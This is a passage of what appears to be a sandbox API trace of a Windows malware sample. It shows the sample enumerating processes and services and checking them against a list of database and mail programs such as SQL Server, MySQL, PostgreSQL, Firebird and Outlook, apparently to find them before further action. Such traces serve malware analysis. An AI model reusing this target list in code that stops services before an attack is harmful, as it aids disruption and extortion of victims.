th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0171.798] lstrlenW (lpString="wininit.exe") returned 11 [0171.798] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.799] lstrlenW (lpString="csrss.exe") returned 9 [0171.800] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0171.800] lstrlenW (lpString="winlogon.exe") returned 12 [0171.801] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0171.801] lstrlenW (lpString="services.exe") returned 12 [0171.802] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0171.802] lstrlenW (lpString="lsass.exe") returned 9 [0171.803] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0171.803] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0171.803] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0171.804] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0171.804] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.805] lstrlenW (lpString="svchost.exe") returned 11 [0171.805] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.806] lstrlenW (lpString="svchost.exe") returned 11 [0171.806] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0171.807] lstrlenW (lpString="dwm.exe") returned 7 [0171.807] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.808] lstrlenW (lpString="svchost.exe") returned 11 [0171.808] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.810] lstrlenW (lpString="svchost.exe") returned 11 [0171.810] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.811] lstrlenW (lpString="svchost.exe") returned 11 [0171.811] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.812] lstrlenW (lpString="svchost.exe") returned 11 [0171.812] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.813] lstrlenW (lpString="svchost.exe") returned 11 [0171.813] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.814] lstrlenW (lpString="svchost.exe") returned 11 [0171.814] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.815] lstrlenW (lpString="svchost.exe") returned 11 [0171.815] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.875] lstrlenW (lpString="svchost.exe") returned 11 [0171.875] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.876] lstrlenW (lpString="svchost.exe") returned 11 [0171.876] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.877] lstrlenW (lpString="svchost.exe") returned 11 [0171.877] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0171.878] lstrlenW (lpString="spoolsv.exe") returned 11 [0171.878] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.879] lstrlenW (lpString="svchost.exe") returned 11 [0171.879] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0171.880] lstrlenW (lpString="audiodg.exe") returned 11 [0171.880] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0171.881] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0171.881] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0171.882] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0171.882] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0171.883] lstrlenW (lpString="Memory Compression") returned 18 [0171.883] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0171.884] lstrlenW (lpString="sihost.exe") returned 10 [0171.884] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.886] lstrlenW (lpString="svchost.exe") returned 11 [0171.886] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0171.887] lstrlenW (lpString="msoia.exe") returned 9 [0171.887] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0171.888] lstrlenW (lpString="taskhostw.exe") returned 13 [0171.888] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.889] lstrlenW (lpString="explorer.exe") returned 12 [0171.889] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0171.890] lstrlenW (lpString="SearchUI.exe") returned 12 [0171.890] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0171.891] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0171.891] lstrcmpiW (lpString1="1c8.exe", lpString2="ShellExperienceHost.exe") returned -1 [0171.892] lstrcmpiW (lpString1="1cv77.exe", lpString2="ShellExperienceHost.exe") returned -1 [0171.892] lstrcmpiW (lpString1="outlook.exe", lpString2="ShellExperienceHost.exe") returned -1 [0171.892] lstrcmpiW (lpString1="postgres.exe", lpString2="ShellExperienceHost.exe") returned -1 [0171.892] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="ShellExperienceHost.exe") returned -1 [0171.892] lstrcmpiW (lpString1="mysqld.exe", lpString2="ShellExperienceHost.exe") returned -1 [0171.892] lstrcmpiW (lpString1="sqlservr.exe", lpString2="ShellExperienceHost.exe") returned 1 [0171.892] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0171.893] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0171.893] lstrcmpiW (lpString1="1c8.exe", lpString2="RuntimeBroker.exe") returned -1 [0171.893] lstrcmpiW (lpString1="1cv77.exe", lpString2="RuntimeBroker.exe") returned -1 [0171.893] lstrcmpiW (lpString1="outlook.exe", lpString2="RuntimeBroker.exe") returned -1 [0171.893] lstrcmpiW (lpString1="postgres.exe", lpString2="RuntimeBroker.exe") returned -1 [0171.893] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="RuntimeBroker.exe") returned -1 [0171.893] lstrcmpiW (lpString1="mysqld.exe", lpString2="RuntimeBroker.exe") returned -1 [0171.893] lstrcmpiW (lpString1="sqlservr.exe", lpString2="RuntimeBroker.exe") returned 1 [0171.893] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.895] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0171.895] lstrcmpiW (lpString1="1c8.exe", lpString2="WmiPrvSE.exe") returned -1 [0171.895] lstrcmpiW (lpString1="1cv77.exe", lpString2="WmiPrvSE.exe") returned -1 [0171.895] lstrcmpiW (lpString1="outlook.exe", lpString2="WmiPrvSE.exe") returned -1 [0171.895] lstrcmpiW (lpString1="postgres.exe", lpString2="WmiPrvSE.exe") returned -1 [0171.895] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="WmiPrvSE.exe") returned -1 [0171.895] lstrcmpiW (lpString1="mysqld.exe", lpString2="WmiPrvSE.exe") returned -1 [0171.895] lstrcmpiW (lpString1="sqlservr.exe", lpString2="WmiPrvSE.exe") returned -1 [0171.895] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0171.896] lstrlenW (lpString="hgaibc.exe") returned 10 [0171.896] lstrcmpiW (lpString1="1c8.exe", lpString2="hgaibc.exe") returned -1 [0171.896] lstrcmpiW (lpString1="1cv77.exe", lpString2="hgaibc.exe") returned -1 [0171.896] lstrcmpiW (lpString1="outlook.exe", lpString2="hgaibc.exe") returned 1 [0171.896] lstrcmpiW (lpString1="postgres.exe", lpString2="hgaibc.exe") returned 1 [0171.896] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="hgaibc.exe") returned 1 [0171.896] lstrcmpiW (lpString1="mysqld.exe", lpString2="hgaibc.exe") returned 1 [0171.896] lstrcmpiW (lpString1="sqlservr.exe", lpString2="hgaibc.exe") returned 1 [0171.896] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0171.897] lstrlenW (lpString="cmd.exe") returned 7 [0171.897] lstrcmpiW (lpString1="1c8.exe", lpString2="cmd.exe") returned -1 [0171.897] lstrcmpiW (lpString1="1cv77.exe", lpString2="cmd.exe") returned -1 [0171.897] lstrcmpiW (lpString1="outlook.exe", lpString2="cmd.exe") returned 1 [0171.897] lstrcmpiW (lpString1="postgres.exe", lpString2="cmd.exe") returned 1 [0171.898] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="cmd.exe") returned 1 [0171.898] lstrcmpiW (lpString1="mysqld.exe", lpString2="cmd.exe") returned 1 [0171.898] lstrcmpiW (lpString1="sqlservr.exe", lpString2="cmd.exe") returned 1 [0171.898] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0171.899] lstrlenW (lpString="conhost.exe") returned 11 [0171.899] lstrcmpiW (lpString1="1c8.exe", lpString2="conhost.exe") returned -1 [0171.899] lstrcmpiW (lpString1="1cv77.exe", lpString2="conhost.exe") returned -1 [0171.899] lstrcmpiW (lpString1="outlook.exe", lpString2="conhost.exe") returned 1 [0171.899] lstrcmpiW (lpString1="postgres.exe", lpString2="conhost.exe") returned 1 [0171.899] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="conhost.exe") returned 1 [0171.899] lstrcmpiW (lpString1="mysqld.exe", lpString2="conhost.exe") returned 1 [0171.899] lstrcmpiW (lpString1="sqlservr.exe", lpString2="conhost.exe") returned 1 [0171.899] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0171.900] lstrlenW (lpString="consent.exe") returned 11 [0171.900] lstrcmpiW (lpString1="1c8.exe", lpString2="consent.exe") returned -1 [0171.900] lstrcmpiW (lpString1="1cv77.exe", lpString2="consent.exe") returned -1 [0171.900] lstrcmpiW (lpString1="outlook.exe", lpString2="consent.exe") returned 1 [0171.900] lstrcmpiW (lpString1="postgres.exe", lpString2="consent.exe") returned 1 [0171.900] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="consent.exe") returned 1 [0171.900] lstrcmpiW (lpString1="mysqld.exe", lpString2="consent.exe") returned 1 [0171.900] lstrcmpiW (lpString1="sqlservr.exe", lpString2="consent.exe") returned 1 [0171.900] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0171.901] CloseHandle (hObject=0x42c) returned 1 [0171.901] Sleep (dwMilliseconds=0x1f4) [0172.486] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c498 [0172.487] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0172.487] GetLastError () returned 0xea [0172.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x46a4f50 [0172.487] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x46a4f50, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x46a4f50, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0172.488] CloseServiceHandle (hSCObject=0x458c498) returned 1 [0172.488] lstrlenW (lpString="Appinfo") returned 7 [0172.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0172.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0172.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0172.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0172.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0172.489] lstrlenW (lpString="AppXSvc") returned 7 [0172.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0172.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0172.489] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0172.489] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0172.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0172.489] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0172.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0172.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0172.489] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0172.489] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0172.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0172.489] lstrlenW (lpString="Audiosrv") returned 8 [0172.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0172.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0172.489] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0172.489] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0172.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0172.489] lstrlenW (lpString="BFE") returned 3 [0172.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0172.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0172.489] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0172.489] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0172.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0172.489] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0172.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0172.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0172.490] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0172.490] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0172.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0172.490] lstrlenW (lpString="CDPSvc") returned 6 [0172.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0172.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0172.490] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0172.490] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0172.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0172.490] lstrlenW (lpString="ClickToRunSvc") returned 13 [0172.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0172.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0172.490] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0172.490] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0172.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0172.490] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0172.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0172.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0172.490] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0172.490] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0172.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0172.490] lstrlenW (lpString="CryptSvc") returned 8 [0172.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0172.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0172.490] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0172.490] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0172.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0172.490] lstrlenW (lpString="DcomLaunch") returned 10 [0172.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0172.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0172.491] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0172.491] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0172.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0172.491] lstrlenW (lpString="DeviceAssociationService") returned 24 [0172.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0172.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0172.491] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0172.491] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0172.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0172.491] lstrlenW (lpString="Dhcp") returned 4 [0172.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0172.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0172.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0172.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0172.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0172.491] lstrlenW (lpString="Dnscache") returned 8 [0172.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 